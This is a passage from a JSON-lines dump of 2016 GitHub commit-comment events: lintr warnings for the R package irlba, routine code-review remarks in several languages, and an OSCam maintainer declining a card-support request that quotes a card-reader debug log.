cbind(v$v, RND / norm2(RND))\n                             ^~~~~\n```\n[R/irlba.R:320:9:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L320) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      if(tol * ans$d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n        ^\n```\n[R/irlba.R:386:10:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L386) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​    F <- orthog(F, V[, 1:k])\n         ^~~~~~\n```\n[R/irlba.R:387:23:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L387) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​    V[, k + 1] <- F / norm2(F)\n                      ^~~~~\n```\n[R/irlba.R:409:26:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L409) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​      V[, 1] <- V[, 1] / norm2(V[, 1])\n                         ^~~~~\n```\n[R/irlba.R:441:40:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L441) *warning:* **no visible global function definition for ‘cross’, Did you mean 'class'?**\n```r\n​      W[, j_w] <- W[, j_w] - ds * drop(cross(dv, VJ)) * du\n                                       ^~~~~\n```\n[R/irlba.R:447:17:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L447) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      W[, j] <- orthog (W[, j, drop=FALSE], W[, 1:(j - 1), drop=FALSE])\n                ^~~~~~\n```\n[R/irlba.R:450:10:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L450) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​    S <- norm2(W[, j_w, drop=FALSE])\n         ^~~~~\n```\n[R/irlba.R:456:32:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L456) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      if (w_dim > 1) W[, j] <- orthog(W[, j], W[, 1:(j - 1)])\n                               ^~~~~~\n```\n[R/irlba.R:457:30:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L457) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​      W[, j_w] <- W[, j_w] / norm2(W[, j_w])\n                             ^~~~~\n```\n[R/irlba.R:477:12:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L477) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      F <- orthog(F, V[, 1:j, drop=FALSE])\n           ^~~~~~\n```\n[R/irlba.R:480:14:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L480) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​        R <- norm2(F)\n             ^~~~~\n```\n[R/irlba.R:485:16:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L485) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​          F <- orthog(F, V[, 1:j, drop=FALSE])\n               ^~~~~~\n```\n[R/irlba.R:486:29:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L486) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​          V[, j + 1] <- F / norm2(F)\n                            ^~~~~\n```\n[R/irlba.R:516:48:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L516) *warning:* **no visible global function definition for ‘cross’, Did you mean 'class'?**\n```r\n​          W[, jp1_w] <- W[, jp1_w] - ds * drop(cross(dv, VJP1)) * du\n                                               ^~~~~\n```\n[R/irlba.R:523:48:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L523) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​        if (reorth && w_dim > 1) W[, j + 1] <- orthog(W[, j + 1], W[, 1:j])\n                                               ^~~~~~\n```\n[R/irlba.R:524:14:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L524) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​        S <- norm2(W[, jp1_w])\n             ^~~~~\n```\n[R/irlba.R:529:40:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L529) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​          if (w_dim > 1) W[, j + 1] <- orthog(W[, j + 1], W[, 1:j])\n                                       ^~~~~~\n```\n[R/irlba.R:530:38:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L530) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​          W[, jp1_w] <- W[, jp1_w] / norm2(W[, jp1_w])\n                                     ^~~~~\n```\n[R/irlba.R:550:12:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L550) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​    R_F <- norm2(F)\n           ^~~~~\n```\n[R/irlba.R:613:5:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L613) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(tol * d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n    ^\n```\n[R/prcomp.R:84:16:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/prcomp.R#L84) *warning:* **no visible binding for global variable ‘irlba’**\n```r\n​  s <- do.call(irlba, args=args)\n               ^~~~~\n```\n[R/utility.R:19:13:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/utility.R#L19) *warning:* **no visible global function definition for ‘cross’, Did you mean 'class'?**\n```r\n​  drop(sqrt(cross(x)))\n            ^~~~~\n```\n[tests/edge.R:31:19:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/tests/edge.R#L31) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​for (tol in 10 ^ -(7:12))\n                  ^\n```"}},"created_at":"2016-09-16T16:11:43Z"}
{"id":"4574953628","type":"CommitCommentEvent","actor":{"login":"YY3ai2ui24"},"repo":{"name":"aidma-playground/socket.io-chat"},"payload":{"comment":{"id":19056433,"position":13,"line":31,"path":"client.js","commit_id":"f66d252dfc83ca4110c3ea91eba41b97183b4dde","created_at":"2016-09-16T16:11:59Z","updated_at":"2016-09-16T16:11:59Z","body":"なるほど、大切な仕様ですね！\r\n勉強になりました。\r\nありがとうございます！"}},"created_at":"2016-09-16T16:11:59Z"}
{"id":"4574954463","type":"CommitCommentEvent","actor":{"login":"NSkelsey"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":19056436,"position":51,"line":111,"path":"backend/globaleaks/db/migration.py","commit_id":"19aae6f302f207ee2f8c7e45f3d4e0980cd75d63","created_at":"2016-09-16T16:12:10Z","updated_at":"2016-09-16T16:12:10Z","body":"ACK"}},"created_at":"2016-09-16T16:12:10Z"}
{"id":"4574956433","type":"CommitCommentEvent","actor":{"login":"Sharpienero"},"repo":{"name":"callofduty4x/mysql"},"payload":{"comment":{"id":19056440,"position":249,"line":249,"path":"script_functions.c","commit_id":"54d105e735003879e8c088b2db9b59074a697ee0","created_at":"2016-09-16T16:12:33Z","updated_at":"2016-09-16T16:12:33Z","body":"@T-Maxxx This needs to be written the \"same way\" as ours. We took a lot of time to consider the way it'll hand data back in a 2 dimensional array (for multiple rows) or a single dimension array (for a single row). \r\n\r\nThe only real issue with our original function was that we were allocating the memory in the incorrect place. It should've been inside of the while rather than the for (where fieldArray was being defined)."}},"created_at":"2016-09-16T16:12:33Z"}
{"id":"4574957752","type":"CommitCommentEvent","actor":{"login":"wlynch"},"repo":{"name":"amy/shetalks"},"payload":{"comment":{"id":19056446,"position":1,"line":1,"path":"handlers/eventHandlers.go","commit_id":"b107abba5c1ce2ae106c7235b88543b8b8600160","created_at":"2016-09-16T16:12:48Z","updated_at":"2016-09-16T16:12:48Z","body":"Also for reference https://godoc.org/github.com/amy/shetalks"}},"created_at":"2016-09-16T16:12:48Z"}
{"id":"4574965924","type":"CommitCommentEvent","actor":{"login":"Svetomech"},"repo":{"name":"Svetomech/IT_lessons"},"payload":{"comment":{"id":19056455,"position":10,"line":10,"path":"Calculator/main.cpp","commit_id":"38c2277583ec3d8ba77c4b65d6342a8055ce6112","created_at":"2016-09-16T16:14:23Z","updated_at":"2016-09-16T16:14:23Z","body":"Когда выражение передаётся как аргумент в конструктор. В методе main() есть примеры, это третий.\r\nauto calc3 = new Calculator(InputType::Constructor, \"2 * 5 - 7 / 3 + (2 - 1 / 2)\");"}},"created_at":"2016-09-16T16:14:23Z"}
{"id":"4574970450","type":"CommitCommentEvent","actor":{"login":"josephbill"},"repo":{"name":"josephbill/FacebookLogIN"},"payload":{"comment":{"id":19056466,"position":null,"line":null,"path":null,"commit_id":"9c4887f12c7c99ec3f856b1c3126cecd70a3ba20","created_at":"2016-09-16T16:15:18Z","updated_at":"2016-09-16T16:15:18Z","body":"each piece of code contains a comment section explaining the code"}},"created_at":"2016-09-16T16:15:18Z"}
{"id":"4574971938","type":"CommitCommentEvent","actor":{"login":"juniorz"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19056468,"position":27,"line":55,"path":"otrv4.md","commit_id":"681601240eea147f72000007742039268565ff16","created_at":"2016-09-16T16:15:36Z","updated_at":"2016-09-16T16:15:36Z","body":"For me talk about Online vs Offline conversation is misleading. See this example:\r\n\r\nAlice and Bob are online, they start a conversation with an interactive AKE, so both have online and offline repudiation. Then Bob goes offline. Alice is still able to send messages to Bob without needing to start a new non-interactive AKE (what was described in this session as an offline conversation) and she does not lose repudiation for the original AKE just because Bob went offline."}},"created_at":"2016-09-16T16:15:36Z"}
{"id":"4574972238","type":"CommitCommentEvent","actor":{"login":"chenEdgar"},"repo":{"name":"chenEdgar/BUG"},"payload":{"comment":{"id":19056469,"position":null,"line":null,"path":null,"commit_id":"99f6e75998a48592f16e730144b1f4b0733c3ca7","created_at":"2016-09-16T16:15:40Z","updated_at":"2016-09-16T16:15:40Z","body":"目标位置loadmore.vue 259行\r\nreturn this.$el.getBoundingClientRect().bottom === this.scrollEventTarget.getBoundingClientRect().bottom\r\n永远不相等。\r\n改为 this.$el.getBoundingClientRect().bottom < this.scrollEventTarget.getBoundingClientRect().bottom + 1"}},"created_at":"2016-09-16T16:15:40Z"}
{"id":"4574973065","type":"CommitCommentEvent","actor":{"login":"T-Maxxx"},"repo":{"name":"callofduty4x/mysql"},"payload":{"comment":{"id":19056471,"position":249,"line":249,"path":"script_functions.c","commit_id":"54d105e735003879e8c088b2db9b59074a697ee0","created_at":"2016-09-16T16:15:49Z","updated_at":"2016-09-16T16:15:49Z","body":"Agreed. But there's no `mysql_fetch_rows()` in MySQL docs."}},"created_at":"2016-09-16T16:15:49Z"}
{"id":"4574975048","type":"CommitCommentEvent","actor":{"login":"enragedginger"},"repo":{"name":"enragedginger/mpg"},"payload":{"comment":{"id":19056476,"position":null,"line":null,"path":null,"commit_id":"61375966f3f58ad693375ad3026d701cad2ebec0","created_at":"2016-09-16T16:16:13Z","updated_at":"2016-09-16T16:16:13Z","body":"IIRC, I was running into issues where `(u/pg-param-type stmt idx)` was returning `int4` or something like that. Since that wasn't a specified `case` value, an exception was being thrown on the `case` form, but outside of the try-catch.\r\n\r\nI threw this hack in because I was working on a one-off project and needed to just run a job once, so building locally and just using that artifact was an acceptable use case.\r\n\r\nThe long term solution requires more work than I had time for at the time. A first, somewhat naive, approach would be to first try matching on whatever `(u/pg-param-type stmt idx)` returns and if the evaluation of that whole process throws an appropriate exception, we try it against with whatever `(name default-map)` returns. But that's a convoluted approach.\r\n\r\nAlternatively, we convert each of the forms for each of the four cases (json, jsonb, citext, hstore) to functions, and then just call the appropriate function on the first try. I can submit a real pull request for this within the next week or two if you'd like."}},"created_at":"2016-09-16T16:16:13Z"}
{"id":"4574978119","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19056484,"position":null,"line":null,"path":null,"commit_id":"399a1546de71f41598c15edada28e7f0d616f541","created_at":"2016-09-16T16:16:48Z","updated_at":"2016-09-16T16:16:48Z","body":"Also see [Cut-over to CRYPTOPP_ASSERT due to CVE-2016-7420](https://github.com/weidai11/cryptopp/issues/277)."}},"created_at":"2016-09-16T16:16:48Z"}
{"id":"4574981413","type":"CommitCommentEvent","actor":{"login":"nx111"},"repo":{"name":"nx111/oscam"},"payload":{"comment":{"id":19056494,"position":null,"line":null,"path":null,"commit_id":"4312e2c8279fa7746017d25df7cfc6d675faaa46","created_at":"2016-09-16T16:17:29Z","updated_at":"2016-09-16T16:17:29Z","body":"Sorry,you can ask it in streamboard.tv. I can't do it.\n\n2016-09-16 20:16 GMT+08:00 FFTEAM-Thomas <notifications@github.com>:\n\n> 098c sky germany please add\n>\n> 2016/09/16 14:14:32 66BECD07 c (ecm) root (098C@000000/0B58/0074/9D:\n> C535C82A67A30A1AB8428E5C6F4C99BE:0F0600100000000A:Sky Cinema HD): not\n> found (1 ms) by sky_v14-1234567 - Sky Action HD\n> 2016/09/16 14:14:32 087D96AA r (reader) sky_v14-1234567 [videoguard2]\n> cardreader_do_checkhealth: reader->card_status = 2, ret = 1\n> 2016/09/16 14:14:32 66BECD07 c (dvbapi) Demuxer 0 restarting\n> decodingrequests after 0 ms with 1 enabled and 2 disabled ecmpids!\n> 2016/09/16 14:14:32 66BECD07 c (dvbapi) Demuxer 0 trying to descramble PID\n> 2 CAID 098C PROVID 000000 ECMPID 1A11 ANY CHID PMTPID 0063 VPID 03FF\n> 2016/09/16 14:14:32 087D96AA r (reader) sky_v14-1234567 [videoguard2]\n> write to cardreader\n> 2016/09/16 14:14:32 087D96AA r (reader) D1 5C 00 00 04\n> 2016/09/16 14:14:32 087D96AA r (reader) sky_v14-1234567 [videoguard2]\n> Answer from cardreader:\n> 2016/09/16 14:14:32 087D96AA r (reader) 00 00 00 00 90 00\n> 2016/09/16 14:14:33 087D96AA r (reader) sky_v14-1234567 [videoguard2]\n> cardreader_do_checkhealth: reader->card_status = 2, ret = 1\n> 2016/09/16 14:14:33 087D96AA r (reader) sky_v14-1234567 [videoguard2]\n> cardreader_do_ecm: cardreader_do_checkhealth returned rc=1\n> 2016/09/16 14:14:33 087D96AA r (reader) sky_v14-1234567 [videoguard2]\n> write to cardreader\n> 2016/09/16 14:14:33 087D96AA r (reader) D1 40 00 80 79 00 7D 0B 0C EF 27\n> 01 C3 B5 26 89\n> 2016/09/16 14:14:33 087D96AA r (reader) E0 00 00 90 69 C1 01 EE 86 3B 6D\n> 78 26 7A C0 A9\n> 2016/09/16 14:14:33 087D96AA r (reader) A3 AA 99 6D BE 5B 78 FF 4A 6E C3\n> B4 D1 59 19 B9\n> 2016/09/16 14:14:33 087D96AA r (reader) 7D E3 1D DB 45 4F 11 5F 56 32 41\n> 4B 32 CC 79 C1\n> 2016/09/16 14:14:33 087D96AA r (reader) F0 71 2B DB BC 9B 46 D1 6F 5D 4B\n> 32 6B 9C 8C 8D\n> 2016/09/16 14:14:33 087D96AA r (reader) F4 6F 55 15 0F 88 F3 47 51 45 CB\n> 62 14 2B FB 58\n> 2016/09/16 14:14:33 087D96AA r (reader) 28 4A F9 21 49 E2 F8 1A 66 EB 7A\n> 58 35 91 D6 D8\n> 2016/09/16 14:14:33 087D96AA r (reader) F4 88 EA 5E 42 F4 6F 03 02 6D 22\n> AD 83 94\n> 2016/09/16 14:14:33 087D96AA r (reader) sky_v14-1234567 [videoguard2]\n> Answer from cardreader:\n> 2016/09/16 14:14:33 087D96AA r (reader) 90 00\n> 2016/09/16 14:14:33 087D96AA r (reader) sky_v14-1234567 [videoguard2]\n> write to cardreader\n> 2016/09/16 14:14:33 087D96AA r (reader) D3 54 00 00 5E\n> 2016/09/16 14:14:33 087D96AA r (reader) sky_v14-1234567 [videoguard2]\n> Answer from cardreader:\n> 2016/09/16 14:14:33 087D96AA r (reader) 69 E3 6D E2 A7 13 BE 49 B2 C9 12\n> AE 26 FB B3 48\n> 2016/09/16 14:14:33 087D96AA r (reader) B7 DA B7 2B EC A1 38 D1 A3 B7 AD\n> 05 F5 A4 C2 AD\n> 2016/09/16 14:14:33 087D96AA r (reader) 79 E9 8B 24 75 9F E3 3A 5F 33 58\n> 81 CA BF 42 E5\n> 2016/09/16 14:14:33 087D96AA r (reader) 54 63 08 50 C2 DD F3 EE E0 EB 3C\n> 48 37 CA F2 4E\n> 2016/09/16 14:14:33 087D96AA r (reader) 11 17 2B B1 B2 25 A6 7A 39 F7 46\n> 63 DC D4 A8 EA\n> 2016/09/16 14:14:33 087D96AA r (reader) CE 50 96 7C 21 3B 89 CA 12 E2 A2\n> B0 4E EF 90 00\n> 2016/09/16 14:14:33 087D96AA r (reader) sky_v14-1234567 [videoguard2]\n> Decrypted payload\n> 2016/09/16 14:14:33 087D96AA r (reader) 00 00 00 00 00 00 00 00 00 00 00\n> 3E 00 00 22 02\n> 2016/09/16 14:14:33 087D96AA r (reader) 00 80 0E 02 00 00 0F 06 00 10 00\n> 00 00 0A 20 04\n> 2016/09/16 14:14:33 087D96AA r (reader) 00 00 00 00 25 11 00 00 00 00 00\n> 00 00 00 00 00\n> 2016/09/16 14:14:33 087D96AA r (reader) 00 00 00 00 00 00 00 2A 04 00 3E\n> 00 00 55 01 A0\n> 2016/09/16 14:14:33 087D96AA r (reader) 56 08 00 00 00 00 00 00 00 00 2B\n> 02 00 00\n> 2016/09/16 14:14:33 087D96AA r (reader) sky_v14-1234567 [videoguard2]\n> classD3 ins54: no cw --> Card needs pairing/extra data\n> 2016/09/16 14:14:33 087D96AA r (reader) sky_v14-1234567 [videoguard2]\n> classD3 ins54: no cw --> Card is paired! (Debug-ECM-Info: 0F_06 00 10 00 00\n> 00 0A)\n> 2016/09/16 14:14:33 087D96AA r (reader) sky_v14-1234567 [videoguard2]\n> cardreader_do_ecm: after csystem->do_ecm rc=0\n> 2016/09/16 14:14:33 087D96AA r (reader) sky_v14-1234567 [videoguard2]\n> cardreader_do_ecm: ret rc=0\n> 2016/09/16 14:14:33 087D96AA r (reader) sky_v14-1234567 [videoguard2]\n> cardreader_process_ecm: cardreader_do_ecm returned rc=0 (ERROR=0)\n> 2016/09/16 14:14:33 087D96AA r (reader) sky_v14-1234567 [videoguard2]\n> Error processing ecm for caid 098C, provid 000000, srvid 0074, servicename:\n> Sky Action HD\n> 2016/09/16 14:14:33 087D96AA r (reader) sky_v14-1234567 [videoguard2] ecm\n> hash: C535C82A67A30A1AB8428E5C6F4C99BE real time: 96 ms\n> 2016/09/16 14:14:33 66BECD07 c (ecm) root (098C@000000/0B58/0074/9D:\n> C535C82A67A30A1AB8428E5C6F4C99BE:0F0600100000000A:Sky Cinema HD): not\n> found (97 ms) by sky_v14-1234567 - Sky Action HD\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/nx111/oscam/commit/4312e2c8279fa7746017d25df7cfc6d675faaa46#commitcomment-19053175>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAUDcn9K2eNqQlyFhDLoeFBbqF-q7S4Sks5qqoi0gaJpZM4J-4L9>\n> .\n>\n"}},"created_at":"2016-09-16T16:17:29Z"}
{"id":"4574986209","type":"CommitCommentEvent","actor":{"login":"Svetomech"},"repo":{"name":"Svetomech/IT_lessons"},"payload":{"comment":{"id":19056509,"position":33,"line":16,"path":"Calculator/main.cpp","commit_id":"38c2277583ec3d8ba77c4b65d6342a8055ce6112","created_at":"2016-09-16T16:18:26Z","updated_at":"2016-09-16T16:18:26Z","body":"Почему? Выражение передать всё также можно, просто для него теперь нужно указать InputType::Constructor. Иначе было бы несоответствие уже существующим Console и File, т.е. выражение в конструкторе - это ведь тоже один из методов ввода, только в коде. Зачем его отделять от остальных?"}},"created_at":"2016-09-16T16:18:26Z"}
{"id":"4574986549","type":"CommitCommentEvent","actor":{"login":"sjoelund"},"repo":{"name":"modelica/Modelica"},"payload":{"comment":{"id":19056510,"position":39,"line":3458,"path":"Modelica/Blocks/Math.mo","commit_id":"71fb9c898168aff6c11a658c57d40bfb2e3b0382","created_at":"2016-09-16T16:18:30Z","updated_at":"2016-09-16T16:18:30Z","body":"`a´when` is not a UTF-8 string (and MSL should anyway be ASCII, right?). I'll fix the typo in the SVN repo."}},"created_at":"2016-09-16T16:18:30Z"}
{"id":"4574988957","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore"},"payload":{"comment":{"id":19056517,"position":null,"line":null,"path":null,"commit_id":"f00f66b98ecc2a2415141e94477bbaa52b8f4e53","created_at":"2016-09-16T16:18:57Z","updated_at":"2016-09-16T16:18:57Z","body":"TeamCity NEventStore :: Core :: Build [Build 6.0.0-logRefactoring.39](http://build.prxm.it:8813/viewLog.html?buildId=3660&buildTypeId=NEventStore_CI&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 250 Build time: 00:01:20"}},"created_at":"2016-09-16T16:18:57Z"}
{"id":"4574993122","type":"CommitCommentEvent","actor":{"login":"Suremaker"},"repo":{"name":"wongatech/HealthMonitoring"},"payload":{"comment":{"id":19056524,"position":45,"line":63,"path":"HealthMonitoring.Monitors.Core.UnitTests/EndpointMonitorTests.cs","commit_id":"dd36b914e77eb54c5883c390fb3e2e5230b31d2b","created_at":"2016-09-16T16:19:45Z","updated_at":"2016-09-16T16:19:45Z","body":"Previously the number of calls to endpoint1 and endpoint2  were compared, expecting that if we stop endpoint 1 it would be less than endpoint 2, however HealthMonitor is not synchronizing call cycles for endpoints (it just tries to check the given endpoint health in more or less the same intervals), which means that if one endpoint will take more time to check than other, the number of calls will eventually get out of sync."}},"created_at":"2016-09-16T16:19:45Z"}
{"id":"4574993374","type":"CommitCommentEvent","actor":{"login":"alanmoo"},"repo":{"name":"mozilla/science.mozilla.org"},"payload":{"comment":{"id":19056526,"position":null,"line":null,"path":null,"commit_id":"fcdfd7a67b1f50e59c312ce2e14d8042ac4bad79","created_at":"2016-09-16T16:19:48Z","updated_at":"2016-09-16T16:19:48Z","body":"Oh, this repo hadn't gotten moved over to [MoFo Standards](https://github.com/mozillafoundation/mofo-standards), so it looks like you were right. I'll get this migrated over today to follow the new conventions in that link (so that I become right 😁)"}},"created_at":"2016-09-16T16:19:48Z"}
{"id":"4574994361","type":"CommitCommentEvent","actor":{"login":"aaronjones06"},"repo":{"name":"aaronjones06/GroupProject2"},"payload":{"comment":{"id":19056531,"position":null,"line":null,"path":null,"commit_id":"004f8158c60de2008462c41485c7d2d24c153702","created_at":"2016-09-16T16:20:00Z","updated_at":"2016-09-16T16:20:00Z","body":"Added a comment line to the code to see how GitHub tracks changes"}},"created_at":"2016-09-16T16:20:00Z"}
{"id":"4574998640","type":"CommitCommentEvent","actor":{"login":"Suremaker"},"repo":{"name":"wongatech/HealthMonitoring"},"payload":{"comment":{"id":19056540,"position":41,"line":67,"path":"HealthMonitoring.Monitors.Core.UnitTests/EndpointMonitorTests.cs","commit_id":"dd36b914e77eb54c5883c390fb3e2e5230b31d2b","created_at":"2016-09-16T16:20:50Z","updated_at":"2016-09-16T16:20:50Z","body":"here I just check that while endpoint2 is still being called multiple times, the endpoint1 is no longer called. Number of calls are not compared however."}},"created_at":"2016-09-16T16:20:50Z"}
{"id":"4574999111","type":"CommitCommentEvent","actor":{"login":"Svetomech"},"repo":{"name":"Svetomech/IT_lessons"},"payload":{"comment":{"id":19056544,"position":34,"line":27,"path":"Calculator/main.cpp","commit_id":"38c2277583ec3d8ba77c4b65d6342a8055ce6112","created_at":"2016-09-16T16:20:56Z","updated_at":"2016-09-16T16:20:56Z","body":"Зачем добавлять непонятное поведение по-умолчанию? Человек, увидевший _auto calc3 = new Calculator();_ ни за что не догадается, что в этой строчке будет вызван std::cin =>приостановлено выполнение приложения. _auto calc3 = new Calculator(InputType::Console);_ - другое дело."}},"created_at":"2016-09-16T16:20:56Z"}
{"id":"4574999943","type":"CommitCommentEvent","actor":{"login":"crunchyNYC"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19056551,"position":null,"line":null,"path":null,"commit_id":"52b9348809a0298fc676e21d45e017d7967cc7c7","created_at":"2016-09-16T16:21:06Z","updated_at":"2016-09-16T16:21:06Z","body":"I think you need to try against the current master, with bench: 6116200 "}},"created_at":"2016-09-16T16:21:06Z"}
{"id":"4575002800","type":"CommitCommentEvent","actor":{"login":"azah"},"repo":{"name":"SunDwarf/OWAPI"},"payload":{"comment":{"id":19056558,"position":177,"line":177,"path":"owapi/v3/__init__.py","commit_id":"226e12bf6ad9027c1e0fdaaefdc76d779e67a932","created_at":"2016-09-16T16:21:41Z","updated_at":"2016-09-16T16:21:41Z","body":"TIL __init__.py can be more than a blank file. Do you know of any good resources for reading up on more advanced Python stuff?"}},"created_at":"2016-09-16T16:21:41Z"}
{"id":"4575003420","type":"CommitCommentEvent","actor":{"login":"wlynch"},"repo":{"name":"amy/shetalks"},"payload":{"comment":{"id":19056559,"position":11,"line":11,"path":"mysql/eventService.go","commit_id":"b107abba5c1ce2ae106c7235b88543b8b8600160","created_at":"2016-09-16T16:21:48Z","updated_at":"2016-09-16T16:21:48Z","body":"It might be helpful when you're looking to write tests to abstract this out to an EventService interface that defines the CRUD operations, and then a MysqlEventService struct that implements all of the operations w.r.t. mysql."}},"created_at":"2016-09-16T16:21:48Z"}
{"id":"4575005619","type":"CommitCommentEvent","actor":{"login":"joeberkovitz"},"repo":{"name":"hoch/web-audio-api"},"payload":{"comment":{"id":19056564,"position":72,"line":4565,"path":"index.html","commit_id":"f824c20a9d1a659c1c42cacf6bd232c1c2ac93df","created_at":"2016-09-16T16:22:15Z","updated_at":"2016-09-16T16:22:15Z","body":"@hoch that makes sense to me, if it will be used later when the processing model is updated."}},"created_at":"2016-09-16T16:22:15Z"}
{"id":"4575006293","type":"CommitCommentEvent","actor":{"login":"Warkot"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19056568,"position":3,"line":3,"path":"components/_global-navigation.scss","commit_id":"e87d10b7ba78492b36b6a3ea2f460cda5b771fe0","created_at":"2016-09-16T16:22:22Z","updated_at":"2016-09-16T16:22:22Z","body":"<3"}},"created_at":"2016-09-16T16:22:22Z"}
{"id":"4575006776","type":"CommitCommentEvent","actor":{"login":"tcz001"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19056570,"position":27,"line":55,"path":"otrv4.md","commit_id":"681601240eea147f72000007742039268565ff16","created_at":"2016-09-16T16:22:28Z","updated_at":"2016-09-16T16:22:28Z","body":"Agree, I guess we can just use interactive / non-interactive conversation initialization for clarification, no need to say online/offline.\r\nIn this case, we can talk about different scenario in each of them. Thoughts?"}},"created_at":"2016-09-16T16:22:28Z"}
{"id":"4575008847","type":"CommitCommentEvent","actor":{"login":"briansp2020"},"repo":{"name":"RadeonOpenCompute/ROCm-ComputeABI-Doc"},"payload":{"comment":{"id":19056576,"position":10,"line":318,"path":"AMDGPU-ABI.md","commit_id":"af82a04146f4001e278cc37644dcb0a42694641c","created_at":"2016-09-16T16:22:53Z","updated_at":"2016-09-16T16:22:53Z","body":"This line makes it sounds as if those products are legacy products. My understanding based on line 314 above is that Fiji without PCIe Gen3 atomic is legacy, not the products, right?"}},"created_at":"2016-09-16T16:22:53Z"}
{"id":"4575009466","type":"CommitCommentEvent","actor":{"login":"mschwamb"},"repo":{"name":"zooniverse/Panoptes-Front-End"},"payload":{"comment":{"id":19056579,"position":null,"line":null,"path":null,"commit_id":"192dde871cccde5a03a25425e7da8253d1943a48","created_at":"2016-09-16T16:23:01Z","updated_at":"2016-09-16T16:23:01Z","body":">  Volunteer moderators have extra permissions in the Talk board for a particular project. They help moderate discussions and act as a point of contact for the project. Volunteer moderators are selected by the project owner; if you're interested in this role, [contact](/about/contact) Grant Miller, the Zooniverse Communications Lead, and to be put in touch with the researcher. \r\n\r\nI'd suggest not having people go through the Zooniverse core team to ask about being project Talk moderators. The research team info is available on the project about page, and if the research team is doing what they should be doing, they should be on talk and easily able to receive a private message.  It seems better to cut the middle man and tell people to contact the research team of the project they're interested in.  "}},"created_at":"2016-09-16T16:23:01Z"}
{"id":"4575012736","type":"CommitCommentEvent","actor":{"login":"lmlozadad"},"repo":{"name":"lmlozadad/301122_act_2"},"payload":{"comment":{"id":19056583,"position":53,"line":53,"path":"apadrina.html","commit_id":"a9e1fd5cb356213faebd897b7bbc1640ab967518","created_at":"2016-09-16T16:23:39Z","updated_at":"2016-09-16T16:23:39Z","body":"Bueno aqui no me cambes nada!!!!"}},"created_at":"2016-09-16T16:23:39Z"}
